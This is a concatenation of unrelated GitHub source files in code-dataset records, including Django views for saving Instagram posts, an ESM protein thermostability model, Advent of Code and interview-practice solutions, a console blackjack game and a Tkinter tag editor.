Paypal environment variables\nSITE_URL = 'http://127.0.0.1:8000'\nPAYPAL_NOTIFY_URL = 'http://b82e1155.ngrok.io/a-very-hard-to-guess-url/'\nPAYPAL_RECEIVER_EMAIL = 'renandias@yahoo.com.br'","repo_name":"RenanZabeu/renan_auth","sub_path":"settings/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"253369688","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nSolution for day03 2022\n\"\"\"\n\n__author__ = 'Guido Minieri'\n__license__ = 'GPL'\n\n\nimport helper.advent as aoc\nfrom string import ascii_lowercase as lower, ascii_uppercase as upper\n\ndata = aoc.read_input()\n\nscore = ' ' + lower + upper\n\ndef find_error(rucksack):\n l = int(len(rucksack) / 2)\n left, right = rucksack[:l], rucksack[l:]\n return set(left).intersection(set(right))\n\ndef find_badge(group):\n one, two, three = group\n return set(one).intersection(set(two).intersection(set(three)))\n\n# pt 1\nprint(sum(score.find(''.join(find_error(x))) for x in data))\n\n# pt 2\ngroups = [data[x:x+3] for x in range(0, len(data), 3)]\nprint(sum(score.find(''.join(find_badge(x))) for x in groups))\n","repo_name":"gmnr/advent-of-code","sub_path":"2022/03/day03.py","file_name":"day03.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22873181608","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.views.generic import View\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib import messages\n\nfrom .models import IgPage, SavePost, Tags\nfrom .forms import PostForm, PageForm, TagForm\n\nimport utils\n\n\ndef index(request):\n\t\n\treturn render(request, 'index.html', {})\n\n\nclass GetPostImg(LoginRequiredMixin, View):\n\n\tdef get(self, request):\n\n\t\tuserid = request.user.pk\n\n\t\tform = PostForm()\n\t\tsavedposts = SavePost.objects.filter(user=userid).order_by('-id')[:5]\n\n\t\tcontext = {\n\t\t\t'form': form,\n\t\t\t'page': \"None\",\n\t\t\t'post': \"None\",\n\t\t\t'recent': savedposts\n\t\t}\n\n\t\treturn render(request, 'post.html', context)\n\n\tdef post(self, request):\n\n\t\tuserid = request.user.pk\n\t\t\n\t\tform = PostForm(request.POST)\n\t\tresponse = None\n\n\t\tif form.is_valid():\n\n\t\t\tresponse = form.cleaned_data['post']\n\n\t\t\t# imgscript = utils.get_post_script(response, 4)\n\t\t\t# imgurl = utils.get_post_src(imgscript) \n\t\t\timgurl = utils.get_post_script(response, 3, \"postscript\")\n\n\t\t\t## temporary commenting this out:\n\t\t\t# pagescript = utils.get_post_script(response, 4)\n\t\t\t# pagename = utils.get_page_from_post(pagescript, 3)\n\t\t\tpagename = utils.get_post_script(response, 2, \"pagescript\")\n\t\t\t# pagename = \"test\"\n\n\t\t\tcontext = {\n\t\t\t\t'form': form,\n\t\t\t\t'page': pagename,\n\t\t\t\t'post': imgurl,\n\t\t\t\t'recent': \"\"\n\t\t\t}\n\n\t\t\treturn render(request, 'post.html', context)\n\n\nclass GetPage(LoginRequiredMixin, View):\n\n\tdef get(self, request):\n\n\t\tform = PageForm(request.GET)\n\t\tuser = request.user\n\t\t\n\t\tif form.is_valid():\n\t\t\t\n\t\t\tpage = form.cleaned_data['page']\n\t\t\turl = utils.get_page_url(page)\n\n\t\t\trequest.session['page'] = page \n\n\t\t\tigpage = IgPage(page=page, url=url, 
user=user)\n\t\t\tigpage.save()\n\n\t\t\tallpages = IgPage.objects.filter(user=user)\n\n\t\t\tallimgs = utils.get_page_script(url)\n\t\t\t# print allimgs\n\n\t\t\tcontext = {\n\t\t\t\t'form': form,\n\t\t\t\t'page': page,\n\t\t\t\t'pageurl': url,\n\t\t\t\t'posts': allimgs,\n\t\t\t\t'allpages': allpages\n\t\t\t}\n\n\t\t\treturn render(request, 'page.html', context)\n\n\t\telse:\n\t\t\tform = PageForm()\n\t\t\tallpages = IgPage.objects.filter(user=user).order_by('-id')[:5]\n\t\t\tcontext = {\n\t\t\t\t'form': form,\n\t\t\t\t'page': \"None\",\n\t\t\t\t'pageurl': \"\",\n\t\t\t\t'posts': [],\n\t\t\t\t'allpages': allpages,\n\t\t\t}\n\n\t\t\treturn render(request, 'page.html', context)\n\n\nclass SaveIgPost(View):\n\n\tdef get(self, request, **kwargs):\n\n\t\tuserid = request.user.pk\n\t\tigpage = kwargs.get('page')\n\t\timgurl = kwargs.get('img')\n\t\tpageurl = \"https://www.instagram.com/%s\" % igpage\n\n\t\t# print \"this is the img: %s and this the page: %s\" % (imgurl, igpage)\n\n\t\t# Save to DB:\n\t\tsaveigpost = SavePost(url=pageurl, page=igpage, img=imgurl, user=userid)\n\t\tsaveigpost.save()\n\n\t\tpagecontent = \"Img saved! %s %s\" % (igpage, imgurl)\n\n\t\t# return HttpResponse(pagecontent)\n\n\t\t# redirecturl = '/page/?page=%s' % igpage\n\t\tpreviousurl = request.META['HTTP_REFERER']\n\n\t\tmessages.success(request, ('Post was saved!'))\n\n\t\treturn redirect(previousurl)\n\n\nclass ViewSaved(LoginRequiredMixin, View):\n\n\tdef get(self, request):\n\n\t\tuserid = request.user.pk\n\t\tsavedposts = SavePost.objects.filter(user=userid).order_by('-id')\n\t\ttags = savedposts.values('tag').distinct().exclude(tag=None)\n\n\t\tcontext = {\n\t\t\t'posts': savedposts,\n\t\t\t'tags': tags\n\t\t}\n\n\t\treturn render(request, 'saved_posts.html', context)\n\n\nclass PostDetail(LoginRequiredMixin, View):\n\n\tdef get(self, request, postid):\n\n\t\tuserid = request.user.pk\n\t\tpost = SavePost.objects.get(pk=postid)\n\t\t# tags = Tags.objects.filter(user=userid)\n\n\t\t# utils.tag_dropdown(1)\n\n\t\tnext_post = post.id + 1\n\t\tprevious_post = post.id - 1\n\n\t\tform = TagForm(user=userid)\n\n\t\tcontext = {\n\t\t\t'form': form,\n\t\t\t'post': post,\n\t\t\t'next': next_post,\n\t\t\t'previous': previous_post,\n\t\t\t'tag': post.tag\n\t\t}\n\n\t\tif userid == post.user:\n\t\t\treturn render(request, 'post_detail.html', context)\n\t\telse:\n\t\t\treturn redirect('insta:view_saved')\n\n\tdef post(self, request, postid):\n\n\t\t# bind the submitted data; an unbound form never validates\n\t\tform = TagForm(request.POST, user=request.user.id)\n\n\t\tif form.is_valid():\n\n\t\t\ttag = form.cleaned_data['tag']\n\n\t\t\tpost = SavePost.objects.get(pk=postid)\n\t\t\tnext_post = post.id + 1\n\t\t\tprevious_post = post.id - 1\n\n\t\t\tunique_tags = SavePost.objects.filter(tag=tag)\n\n\t\t\tpost.tag = tag\n\t\t\tpost.save()\n\n\t\t\tcontext = {\n\t\t\t\t'form': form,\n\t\t\t\t'post': post,\n\t\t\t\t'next': next_post,\n\t\t\t\t'previous': previous_post,\n\t\t\t\t'tag': post.tag\n\t\t\t}\n\n\t\t\treturn render(request, 'post_detail.html', context)\n\n\t\t# invalid submission: fall back to the saved list\n\t\treturn redirect('insta:view_saved')\n\n\nclass DeletePost(View):\n\n\tdef get(self, request, postid):\n\n\t\tpost = SavePost.objects.get(pk=postid)\n\t\tpost.delete()\n\n\t\treturn redirect('/savedposts/')\n\n\nclass ViewSavedTag(View):\n\t## page to see posts with a certain tag only\n\tdef get(self, request, tag):\n\n\t\ttagged_posts = SavePost.objects.filter(tag=tag)\n\t\tall_tags = SavePost.objects.all().values('tag').distinct().exclude(tag=None)\n\n\t\tcontext = {\n\t\t\t'posts': tagged_posts,\n\t\t\t'tags': all_tags,\n\t\t}\n\n\t\treturn render(request, 
'saved_posts.html', context)\n\n\nclass ManageTags(LoginRequiredMixin, View):\n\n\tdef get(self, request):\n\n\t\tuserid = request.user.id\n\n\t\tall_tags = Tags.objects.filter(user=userid).distinct().exclude(tag=None)\n\t\t# all_tags = SavePost.objects.all().values('tag').distinct().exclude(tag=None)\n\n\t\tform = TagForm(user=userid)\n\n\t\tcontext = {\n\t\t\t'tags': all_tags,\n\t\t\t'form': form,\n\t\t}\n\n\t\treturn render(request, 'manage_tags.html', context)\n\n\tdef post(self, request):\n\n\t\tuserid = request.user.id\n\t\tall_tags = Tags.objects.filter(user=userid).distinct().exclude(tag=None)\n\t\t# all_tags = SavePost.objects.all().values('tag').distinct().exclude(tag=None)\n\n\t\tform = TagForm(request.POST)\n\t\tuserid = request.user.pk\n\t\t# tag_name = form.cleaned_data['tag_name']\n\n\t\tif form.is_valid():\n\t\t\ttag_name = form.cleaned_data['new_tag']\n\t\t\tsave_tag = Tags(tag=tag_name, user=userid)\n\t\t\tsave_tag.save()\n\n\t\t\tcontext = {\n\t\t\t\t'tags': all_tags,\n\t\t\t\t'form': form,\n\t\t\t}\n\n\t\t\treturn render(request, 'manage_tags.html', context)\n\n\nclass EditTag(LoginRequiredMixin, View):\n\n\tdef get(self, request, tag):\n\n\t\tuserid = request.user.id\n\n\t\tall_tags = Tags.objects.filter(user=userid).distinct().exclude(tag=None)\n\t\tcurrent_tag = Tags.objects.filter(pk=tag)\n\n\t\tform = TagForm(user=userid)\n\n\t\tcontext = {\n\t\t\t'tags': all_tags,\n\t\t\t'current_tag': current_tag,\n\t\t\t'form': form,\n\t\t}\n\n\t\treturn render(request, 'edit_tag.html', context)\n\n\tdef post(self, request, tag):\n\n\t\tuserid = request.user.id\n\n\t\tform = TagForm(request.POST)\n\n\t\tif form.is_valid():\n\n\t\t\tall_tags = Tags.objects.filter(user=userid).distinct().exclude(tag=None)\n\t\t\ttag_name = form.cleaned_data['new_tag']\n\t\t\tcurrent_tag = Tags.objects.filter(pk=tag)\n\t\t\tcurrent_tag.update(tag=tag_name)\n\n\t\t\tcontext = {\n\t\t\t\t'tags': all_tags,\n\t\t\t\t'current_tag': current_tag,\n\t\t\t\t'form': form,\n\t\t\t}\n\t\t\ttry:\n\t\t\t\tmessages.success(request, ('Tag was successfully changed'))\n\t\t\t\treturn render(request, 'manage_tags.html', context)\n\t\t\t\n\t\t\texcept:\n\t\t\t\tmessages.success(request, ('Something went wrong...'))\n\t\t\t\treturn render(request, 'edit_tag.html', context)\n\n\nclass DeleteTag(View):\n\n\tdef get(self, request, tag):\n\n\t\ttag = Tags.objects.get(pk=tag)\n\t\ttag.delete()\n\t\tmessages.success(request, ('Tag was successfully deleted'))\n\n\t\treturn redirect('/tags/')\n\n\t\t\n\n\n\n\t# Further development:\n\t# + after entering page, you see the first 10 posts, and you can tag and save to the database\n\t# + after entering post url, you can save the post to database\n\t# + page with all saved post\n\t# + logic to delete post on detail page\n\t# + posts page should have all saved posts with filters by tag\n\t# + post detail page, you can see full size and change tag here\n\t# + manage tag page (create, delete or rename tags)\n\t# + page view: scroll and grid view\n\t# - page view: sort by page\n\t# - rename variables with underscore in naming (correct python naming)\n\t# - add original post url to model/db\n\n\n\t# Bug:\n\t# + Underscores or periods in page names\n\t# + Some posts don't load\n\t# - Previous and next buttons on Saved Post detail page\n\t# - tags with spaces don't work on savedposts 
page\n\n\n\n","repo_name":"n-ck/insta_app","sub_path":"insta/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71518109287","text":"import torch\nfrom transformers import AutoTokenizer, EsmForSequenceClassification, EsmModel\nfrom torch import nn\nfrom thermostability.hotinfer import CachedModel, RepresentationKeysComb\nfrom thermostability.hotinfer_pregenerated import create_fc_layers\nfrom typing import Literal, Iterator\nimport os\nfrom util.yaml_config import YamlConfig\n\nESMSizes = Literal[\"8M\", \"35M\", \"150M\", \"650M\", \"3B\", \"15B\", \"v1_1B\"]\n\nmodel_names = {\n \"8M\": \"facebook/esm2_t6_8M_UR50D\",\n \"35M\": \"facebook/esm2_t12_35M_UR50D\",\n \"150M\": \"facebook/esm2_t30_150M_UR50D\",\n \"650M\": \"facebook/esm2_t33_650M_UR50D\",\n \"3B\": \"facebook/esm2_t36_3B_UR50D\",\n \"15B\": \"facebook/esm2_t48_15B_UR50D\",\n \"v1_1B\": \"facebook/esm1b_t33_650M_UR50S\",\n}\n\nrequired_config_attributes = [\n \"hugg_esm_freeze\",\n \"hugg_esm_size\",\n]\n\nembedding_dims = {\n \"8M\": 320,\n \"35M\": 480,\n \"150M\": 640,\n \"650M\": 1280,\n \"3B\": 2560,\n \"15B\": 5120,\n \"v1_1B\": 1280,\n}\n\n\nclass ESMAttention1dMean(nn.Module):\n \"\"\"Regression head from FLIP: Attention1d removed, leaving a basic linear model\"\"\"\n\n def __init__(self, d_embedding): # [batch x embedding (1280)] --> [batch x 1]\n super(ESMAttention1dMean, self).__init__()\n self.linear = nn.Linear(d_embedding, d_embedding)\n self.relu = nn.ReLU()\n self.final = nn.Linear(d_embedding, 1)\n\n def forward(self, x):\n x = self.relu(self.linear(x))\n x = self.final(x)\n return x\n\n\nclass ESMForThermostability(CachedModel):\n def __init__(\n self,\n freeze_esm: bool = False,\n model_size: ESMSizes = \"8M\",\n pooling: Literal[\"bos_token\", \"mean\", \"mean_FLIP\"] = \"bos_token\",\n cache_dir: str = None,\n ):\n super().__init__(\n f\"{pooling}_{model_size}\",\n caching=freeze_esm,\n enable_grad=not freeze_esm,\n cache_dir=cache_dir,\n )\n assert (\n model_size in model_names\n ), f\"Invalid ESM2 model size (--hugg_esm_size): {model_size}. 
Must be in {model_names.keys()} \"\n\n self.model_size = model_size\n self.tokenizer = AutoTokenizer.from_pretrained(\n model_names[model_size], cache_dir=cache_dir\n )\n self.regression = ESMAttention1dMean(embedding_dims[model_size])\n\n self.freeze_esm = freeze_esm\n self.esm = (\n None if freeze_esm else self._get_esm()\n ) # make sure esm is included in learnable params if unfreezed\n self.pooling = pooling\n self.cache_dir = cache_dir\n\n def _get_esm(self):\n if self.esm is None:\n self.esm = EsmModel.from_pretrained(\n model_names[self.model_size], cache_dir=self.cache_dir\n ).to(\"cuda:0\")\n return self.esm\n\n def forward(self, sequences: \"list[str]\"):\n batch_pooled_embeddings = self.get_cached_or_compute(sequences)\n return self.regression(batch_pooled_embeddings)\n\n def compute_representations(self, seqs: \"list[str]\", _: RepresentationKeysComb):\n assert (\n torch.is_grad_enabled() == self._enable_grad\n ), f\"Grad enabled state does not match for esm bos token embeddings computation (required: {self._enable_grad}, actual: {torch.is_grad_enabled()})\"\n esm = self._get_esm()\n input_ids = self.tokenizer(\n seqs, padding=True, truncation=True, return_tensors=\"pt\"\n ).input_ids.to(\"cuda:0\")\n\n outputs = esm(input_ids)\n last_hidden_state = outputs.last_hidden_state\n\n s_embedding = (\n last_hidden_state[:, 0, :]\n if self.pooling == \"bos_token\"\n else torch.mean( # mean over sequence for each token embedding except bos token\n last_hidden_state[\n :,\n 1:,\n ],\n dim=1,\n )\n )\n return s_embedding\n\n def get_learnable_parameters(self) -> Iterator[nn.Parameter]:\n return (\n self.parameters() if not self.freeze_esm else self.regression.parameters()\n )\n\n @classmethod\n def from_config(cls, config, yaml_config: YamlConfig):\n for attr in required_config_attributes:\n assert (\n attr in config\n ), f\"Missing required attribute {attr} in config for ESMForThermostability\"\n\n return ESMForThermostability(\n freeze_esm=config[\"hugg_esm_freeze\"],\n model_size=config[\"hugg_esm_size\"],\n pooling=config[\"hugg_esm_pooling\"],\n cache_dir=yaml_config[\"HuggESMCacheDir\"],\n ).cuda()\n","repo_name":"LeonHermann322/hot-prot","sub_path":"thermostability/huggingface_esm.py","file_name":"huggingface_esm.py","file_ext":"py","file_size_in_byte":4581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12694073623","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# Licensed under the GNU General Public License, version 3.\n# See the file http://www.gnu.org/licenses/gpl.txt\n\nfrom inary.actionsapi import get\nfrom inary.actionsapi import autotools\nfrom inary.actionsapi import inarytools\nfrom inary.actionsapi import shelltools\n\n\ndef setup():\n options = \"--disable-gtk-doc-html \\\n --disable-gtk-doc \\\n --enable-introspection \\\n \"\n \n if get.buildTYPE() == \"_emul32\":\n options += \" --libdir=/usr/lib32 \\\n --bindir=/usr/_emul32/bin \\\n --sbindir=/usr/_emul32/sbin \\\n \"\n shelltools.export(\"CC\", \"%s -m32\" % get.CC())\n shelltools.export(\"CXX\", \"%s -m32\" % get.CXX())\n shelltools.export(\"PKG_CONFIG_PATH\", \"/usr/lib32/pkgconfig\")\n\n autotools.configure(options)\n\ndef build():\n autotools.make()\n\ndef install():\n autotools.rawInstall(\"DESTDIR=%s\" % get.installDIR())\n \n if get.buildTYPE() == \"_emul32\":\n 
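# for 32-bit (_emul32) builds, drop the temporary /usr/_emul32 staging tree so only the lib32 libraries are packaged\n        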
inarytools.removeDir(\"/usr/_emul32\")\n\n","repo_name":"Zaryob/SulinRepository","sub_path":"programming/misc/json-glib/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"22854316706","text":"# Python script to unzip the data \nfrom zipfile import ZipFile\n\n# uncompress the zip file \ndef uncompress_file(zip_path):\n    with ZipFile(zip_path) as zipf:\n        zipf.extractall('/opt/udacity_training_data')\n\n# Uncompress the data archive\nuncompress_file('data.zip')","repo_name":"sreenivr/SCND_Behavioral_Cloning","sub_path":"prepare_data.py","file_name":"prepare_data.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70245917289","text":"def is_palindrome(input: str) -> bool:\n    \"\"\"\n    Checks whether the input string is a valid palindrome.\n    A palindrome is a string that reads the same from the front\n    and from the back.\n    \"\"\"\n\n    left = 0\n    right = len(input) - 1\n    while left <= right:\n        if input[left] != input[right]:\n            return False\n        left += 1\n        right -= 1\n    return True\n","repo_name":"codemuseKE/ace-technical-interview","sub_path":"src/data-structures/linear/strings/py/palindrome/valid_palindrome.py","file_name":"valid_palindrome.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"53"} +{"seq_id":"13969090624","text":"\"\"\"\nFind the number missing from the range 1..n using XOR.\n\"\"\"\nfrom typing import List\n\n\ndef find_missing_num(num_array:List[int], n:int):\n    if not num_array:\n        return None\n    n_xor = 0\n    for i in range(1, n+1):\n        n_xor ^= i\n\n    for num in num_array:\n        n_xor ^= num\n\n    return n_xor\n\n\"\"\"\nA list contains every number twice except one; find the unique number.\n\"\"\"\ndef find_non_duplicate_number(num_array:List[int]):\n    result = 0\n\n    for num in num_array:\n        result ^= num\n\n    return result\n\nif __name__ == \"__main__\":\n    print(find_missing_num([1,3,5,4,6], 6))\n    print(find_non_duplicate_number([2,2,3,4,3,5,6,5,6]))","repo_name":"alisha017/Computer-Science-Fundamentals","sub_path":"InterviewCamp/Bit_Manipulation/duplicate_xor.py","file_name":"duplicate_xor.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25244502653","text":"import random\n# global variables that will be used\n\npossible_suits = ('H','D','C','S')\npossible_ranking = ('A','2','3','4','5','6','7','8','9','10','J','Q','K')\ncard_values = {'A':1, '2':2, '3':3, '4':4, '5':5, '6':6, '7':7, '8':8, '9':9, '10':10, 'J':10, 'Q':10, 'K':10}\nis_playing = False\nchip_pool = 100\nbet = 0\nrestart_phrase = \"Press 'd' to deal the cards again, or press 'q' to quit\"\nphrase = ''\n\nclass Card(object):\n    def __init__(self,suit,rank):\n        self.suit = suit\n        self.rank = rank\n    def __str__(self):\n        return self.suit + self.rank\n    def draw(self):\n        print( self.suit , self.rank)\n    def getSuit(self):\n        return self.suit\n    def getRank(self):\n        return self.rank\n\nclass Hand(object):\n    def __init__(self):\n        self.cards = []\n        self.value = 0\n        self.has_ace = False\n    def __str__(self):\n        all_cards_in_hand = ''\n        for card in self.cards:\n            card_name = card.__str__()\n            all_cards_in_hand += \" \" + card_name\n        return 'the hand has %s' % (all_cards_in_hand)\n    def add_card(self,card):\n        self.cards.append(card)\n        if card.rank == 'A' and self.value < 
12:\n self.value += 10\n else:\n self.value += card_values[card.rank]\n def draw(self, hidden):\n if hidden == True and is_playing == True :\n starting_card = 1\n else:\n starting_card = 0\n for x in range(starting_card, len(self.cards)):\n self.cards[x].draw()\n def getValue(self):\n return self.value\n\nclass Deck(object):\n def __init__(self):\n self.deck = []\n # initialize the deck\n for suit in possible_suits:\n for rank in possible_ranking:\n self.deck.append(Card(suit,rank))\n def shuffle_deck(self):\n random.shuffle(self.deck)\n def deal(self):\n return self.deck.pop()\n def __str__(self):\n composition = ''\n for card in self.deck:\n composition += card.__str__ + ' '\n return composition\n\ndef make_a_bet():\n\n global bet\n\n print(' What amount of chips would you like to bet? (Enter whole integer please): ')\n while True:\n try:\n bet_comp = int(input()) # Use bet_comp as a checker\n # Check to make sure the bet is within the remaining amount of chips left.\n if bet_comp >= 1 and bet_comp <= chip_pool:\n bet = bet_comp\n break\n else:\n print(\"Invalid bet, you only have \" + str(chip_pool) + \" remaining\")\n continue\n except :\n print('please enter a valid number.Try again ')\n continue\n\n\n# 4 choices, hit, stand, quit, deal\n# 1 method for each\n\ndef deal():\n global bet, chip_pool,is_playing,dealer_hand,player_hand, phrase, deck\n\n # Create a deck\n deck = Deck()\n\n # Shuffle the deck\n deck.shuffle_deck()\n\n # Set up bet\n make_a_bet()\n\n # initialize both a playe hand and a dealer hand\n player_hand = Hand()\n dealer_hand = Hand()\n\n # Deal out 2 cards each\n player_hand.add_card(deck.deal())\n player_hand.add_card(deck.deal())\n\n dealer_hand.add_card(deck.deal())\n dealer_hand.add_card(deck.deal())\n\n phrase = \"Hit or Stand? Press either h or s: \"\n if (is_playing == True): # if the player is indeed playing at the moment\n print('Fold, Sorry')\n chip_pool -= bet\n # Set up to know currently playing hand\n is_playing = True\n game()\n\ndef game():\n print()\n print('Player Hand is: '),\n player_hand.draw(hidden=False)\n print('---------------------------------------')\n print('Player hand total is: ' + str(player_hand.getValue()))\n print('---------------------------------------')\n # Display Dealer Hand\n print('Dealer Hand is: '),\n dealer_hand.draw(hidden=True)\n\n # If game round is over\n if is_playing == False:\n print(\" --- for a total of \" + str(dealer_hand.getValue()))\n print(\"Chip Total: \" + str(chip_pool))\n # Otherwise, don't know the second card yet\n else:\n print(\" with another card hidden upside down\")\n print('---------------------------------------')\n print(phrase)\n player_input()\n\n\ndef hit():\n ''' Implement the hit button '''\n global is_playing, chip_pool, deck, player_hand, dealer_hand, phrase, bet\n\n # If hand is in play add card\n if is_playing:\n if player_hand.getValue() <= 21:\n player_hand.add_card(deck.deal())\n print('---------------------------------------')\n print(\"Player hand is %s \\n\" % player_hand)\n\n if player_hand.getValue() > 21:\n phrase = 'Busted! 
' + restart_phrase\n\n chip_pool -= bet\n is_playing = False\n\n else:\n phrase = \"Sorry, can't hit\" + restart_phrase\n\n game()\n\n\ndef stand():\n global is_playing, chip_pool, deck, player_hand, dealer_hand, phrase, bet\n ''' This function will now play the dealers hand, since stand was chosen '''\n\n if is_playing == False:\n if player_hand.getValue() > 0:\n phrase = \"Sorry, you can't stand!\"\n\n # Now go through all the other possible options\n else:\n\n # Soft 17 rule\n while dealer_hand.getValue() < 17:\n dealer_hand.add_card(deck.deal())\n\n # Dealer Busts\n if dealer_hand.getValue() > 21:\n phrase = 'Dealer busts! You win!' + restart_phrase\n chip_pool += bet\n is_playing = False\n\n # Player has better hand than dealer\n elif dealer_hand.getValue() < player_hand.getValue():\n phrase = 'You beat the dealer, you win!' + restart_phrase\n chip_pool += bet\n is_playing = False\n\n # Push\n elif dealer_hand.getValue() == player_hand.getValue():\n phrase = 'Tied up, push!' + restart_phrase\n is_playing = False\n\n # Dealer beats player\n else:\n phrase = 'Dealer Wins!' + restart_phrase\n chip_pool -= bet\n is_playing = False\n game()\n\ndef player_input():\n ''' Read user input, lower case it just to be safe'''\n plin = input().lower()\n\n if plin == 'h':\n hit()\n elif plin == 's':\n stand()\n elif plin == 'd':\n deal()\n elif plin == 'q':\n game_exit()\n else:\n print(\"Invalid Input...Enter h, s, d, or q: \")\n player_input()\n\n\ndef game_exit():\n print('the program is now going to exit, thank you for playing!')\n exit(0)\ndeck = Deck()\ndealer_hand = Hand()\nplayer_hand = Hand()\n#start the game\ndeal()","repo_name":"tarekait1996/python","sub_path":"BlackJackGame.py","file_name":"BlackJackGame.py","file_ext":"py","file_size_in_byte":6597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9533086938","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 4 09:03:58 2016\n\n@author: Kozmik\n\"\"\"\n\nfrom TagsCheckboxModule import TagsCheckboxModule\nfrom tkinter import *\nimport tkinter.messagebox as messagebox\nimport tkinter.simpledialog as simpledialog\nfrom math import ceil\nimport pdb\n\nclass TagsCanvas(Canvas, TagsCheckboxModule):\n def __init__(self, master=None, entry=None, journal=None, **kwargs):\n h = 1\n w = 0\n self.tagslist = {}\n self.dialog = None\n Canvas.__init__(self, master=master, height=h, width=w, highlightthickness=0)\n TagsCheckboxModule.__init__(self, entry=entry, journal=journal)\n \n def clear(self):\n for tag in self.tagslist:\n self.tagslist[tag].destroy()\n self.tagslist = {}\n self.deselectAllBoxes()\n \n def updateCanvas(self, entry):\n self.clear()\n self.updateModule(self, entry)\n \n def addTag(self, tag):\n TagsCheckboxModule.addTag(self, tag)\n if tag not in self.tagslist:\n self.tagslist[tag] = TagButton(self, tag, self)\n# self.tagslist[tag].pack(side=LEFT, padx=1)\n self.sortTags()\n \n def deleteTag(self, tag):\n TagsCheckboxModule.deleteTag(self, tag)\n if tag in self.tagslist:\n self.tagslist[tag].destroy()\n del self.tagslist[tag]\n self.sortTags()\n \n def sortTags(self):\n self.delete('all')\n col = 10\n row = ceil(len(self.tagslist) / col)\n grid = []\n grid = [(x,y) for y in range(0, row) for x in range(0, col)]\n index = 0\n for tag in sorted(self.tagslist):\n self.tagslist[tag].makeInvisible()\n for tag in sorted(self.tagslist):\n x, y = grid[index]\n self.tagslist[tag].grid(column=x, row=y, sticky=EW)\n index += 1#.pack(side=LEFT, padx=1)\n \n def 
getTags(self):\n        return sorted(self.tagslist.keys())\n    \n    def addDialog(self):\n        tags = simpledialog.askstring(title='Add Tags', prompt='Enter at least one tag, separating multiple tags with a comma:')\n        if tags:\n            tags = tags.split(',')\n            for tag in tags:\n                if tag.strip():\n                    self.addTag(tag.strip())\n    \n    def selectDialog(self):\n        self.dialog = Toplevel()\n        self.dialog.title('Select Tags')\n        canvas = self.getCheckboxCanvas(self.dialog)\n        canvas.pack()\n        self.dialog.protocol(\"WM_DELETE_WINDOW\", self.propagateTags)\n    \n    def propagateTags(self):\n        selected_tags = self.getStates()\n        for tag in selected_tags:\n            if selected_tags[tag]:\n                self.addTag(tag)\n            elif not selected_tags[tag]:\n                self.deleteTag(tag)\n        self.sortTags()\n        self.dialog.destroy()\n        self.dialog = None\n    \n    def save(self):\n        tags = self.entry.getTags()\n        while not tags:\n            self.addDialog()\n            tags = self.entry.getTags()\n    \nclass TagButton(Button):\n    def __init__(self, master=None, text=None, controller=None):\n        root = None\n        self.master = master\n        self.controller = controller\n        if not self.master:\n            root = Tk()\n            self.master = TagsCanvas(root)\n        Button.__init__(self, master=self.master, text=text, command=self.changeTagDialog)\n        self.tag = text\n        self.dialog = None\n        self.entry_box = None\n        if root:\n            self.pack(side=LEFT)\n            self.master.pack()\n            root.mainloop()\n    \n    def changeTagDialog(self):\n        self.dialog = Toplevel()\n        self.dialog.grab_set()\n        self.dialog.title('Change Tag')\n        message = Message(self.dialog, text='Enter a new tag here:', width=150)\n        self.entry_box = Entry(self.dialog)\n        self.entry_box.insert(0, self.tag)\n        button_box = Frame(self.dialog)\n        OK = Button(button_box, text='OK', command=self.updateButton)\n        OK.bind(\"<Return>\", lambda event: self.updateButton())\n        CANCEL = Button(button_box, text='Cancel', command=self.dialog.destroy)\n        DELETE = Button(button_box, text='Delete', command=self.delete)\n        message.pack(side=TOP)\n        self.entry_box.pack(side=TOP)\n        OK.pack(side=LEFT)\n        CANCEL.pack(side=LEFT)\n        DELETE.pack(side=LEFT)\n        button_box.pack(side=TOP)\n    \n    def updateButton(self):\n        self.tag = self.entry_box.get()\n        coords = self.grid_info()\n        self.dialog.destroy()\n        self.dialog = None\n        self.config(text=self.tag)\n        self.grid(row=coords[\"row\"], column=coords[\"column\"], sticky=EW)\n    \n    def delete(self):\n        delete = messagebox.askyesno(title='Delete?', message='Are you sure you want to delete this tag?')\n        self.dialog.destroy()\n        self.dialog = None\n        if delete:\n            self.destroy()\n            if isinstance(self.controller, TagsCanvas):\n                self.controller.deleteTag(self.tag)\n    \n    def makeInvisible(self):\n        self.grid_forget()\n    \n    def __str__(self):\n        return self.tag\n    \n    def getTag(self):\n        return self.tag","repo_name":"kozmik-moore/Journal-0.3","sub_path":"TagsCanvas.py","file_name":"TagsCanvas.py","file_ext":"py","file_size_in_byte":5238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1924494576","text":"## Title: Hope_female.py\n## Name : \n## @author : Rahul Manna\n## Created on : 2020-05-18 12:18:49\n## Description : \n\nimport os\nimport sys\nimport time\nimport tflite_runtime.interpreter as tflite\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import PorterStemmer\nfrom modules.user_info_management import reset_data\nfrom 